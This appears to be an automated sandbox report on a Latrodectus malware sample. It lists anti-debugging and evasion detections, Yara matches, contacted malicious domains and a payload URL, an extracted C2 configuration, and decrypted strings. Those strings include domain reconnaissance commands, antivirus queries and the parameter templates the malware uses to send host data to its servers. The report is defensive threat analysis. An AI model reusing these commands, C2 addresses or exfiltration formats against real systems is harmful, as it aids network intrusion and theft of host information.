Source: wscript.exe, 00000000.00000003.2049218463.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040729475.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048754066.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046212474.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158447349.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049827134.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048245243.00000207B5463000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA956000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.3337300936.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006FD0A5 IsDebuggerPresent,OutputDebugStringW,

4_2_006FD0A5

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,

6_2_0000000180066C3C

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\rundll32.exe

6_2_00000001800033E0

Contains functionality to read the PEB

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AD78 mov eax, dword ptr fs:[00000030h]		4_2_0072AD78
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00722DCC mov ecx, dword ptr fs:[00000030h]		4_2_00722DCC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F2310 GetProcessHeap,

4_2_006F2310

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007133A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_007133A8
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071353F SetUnhandledExceptionFilter,	4_2_0071353F
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00712968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00712968
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00716E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00716E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 104.21.59.82 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.136.103 443			Jump to behavior

JavaScript file contains Antivirus product strings

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Initial file: avast, eset, sophos

Contains functionality to launch a program with higher privileges

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,GetProcessId,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,

4_2_006F52F0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,

6_2_000000018004A650

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,

6_2_0000000180049278

Source: Update_3b24da5a.dll.6.dr	Binary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
Source: rundll32.exe	Binary or memory string: Progman
Source: rundll32.exe	Binary or memory string: Program manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_007135A9 cpuid

4_2_007135A9

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E0C6
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_00727132
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E111
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: EnumSystemLocalesW,	4_2_0072E1AC
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_0072E237
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoEx,	4_2_007123F8
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_0072E48A
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0072E5B3
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_0072E6B9
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetLocaleInfoW,	4_2_007276AF
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0072E788
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_0072DE24

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_007137D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_007137D5

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000187EC858AE0 GetUserNameA,wsprintfA,

6_2_00000187EC858AE0

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_00727B1F GetTimeZoneInformation,

4_2_00727B1F

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,

6_2_0000000180040CB0

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: rundll32.exe	Binary or memory string: 360tray.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: rundll32.exe	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe

Stealing of Sensitive Information

Yara detected Latrodectus

Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Latrodectus

Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201da900000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a379500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec840000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.187ec850000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a3794f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.201daae0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1ffb4f00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.59.82	grizmotras.com	United States	13335	CLOUDFLARENETUS	true
172.67.136.103	jarinamaers.shop	United States	13335	CLOUDFLARENETUS	true
45.95.11.217	unknown	Italy	13487	ULTRA-PACKETUS	false

Contacted Domains

Name	IP	Active
jarinamaers.shop	172.67.136.103	true
bg.microsoft.map.fastly.net	199.232.214.172	true
grizmotras.com	104.21.59.82	true
prod.globalsign.map.fastly.net	151.101.2.133	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wrankaget.site/live/	true	Avira URL Cloud: safe	unknown
https://grizmotras.com/live/	true	Avira URL Cloud: safe	unknown
http://45.95.11.217/ad.msi	false	Avira URL Cloud: safe	unknown
https://jarinamaers.shop/live/	true	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 6.2.rundll32.exe.187ec850000.2.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}

Sample uses string decryption to hide its real strings

Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c ipconfig /all
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c systeminfo
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c nltest /domain_trusts
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net view /all /domain
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net view /all
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &ipconfig=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net config workstation
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c whoami /groups
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &systeminfo=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain_trusts=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain_trusts_all=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_view_all_domain=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_view_all=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_group=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &wmic=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_config_ws=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_wmic_av=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &whoami_group=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "pid":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%d",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "proc":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "subproc": [
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &proclist=[
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "pid":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%d",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "proc":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "subproc": [
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &desklinks=[
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Update_%x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Custom_update
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Updater
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: rundll32.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s", %s %s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: runnung
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: :wtfbbq
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: files/bp.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s\%d.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %d.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s\%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: init -zzzz="%s\%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: front
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /files/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Facial
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: !"$%&()*wp
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: POST
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: GET
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: curl/7.88.1
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: CLEARURL
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: COMMAND
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: ERROR
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: <html>
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: <!DOCTYPE
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%d.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: 12345
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &stiller=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%d.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: LogonTrigger
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %x%x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: TimeTrigger
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: PT0H%02dM
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &mac=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %02x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: :%02x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: PT0S
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &computername=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain=%s
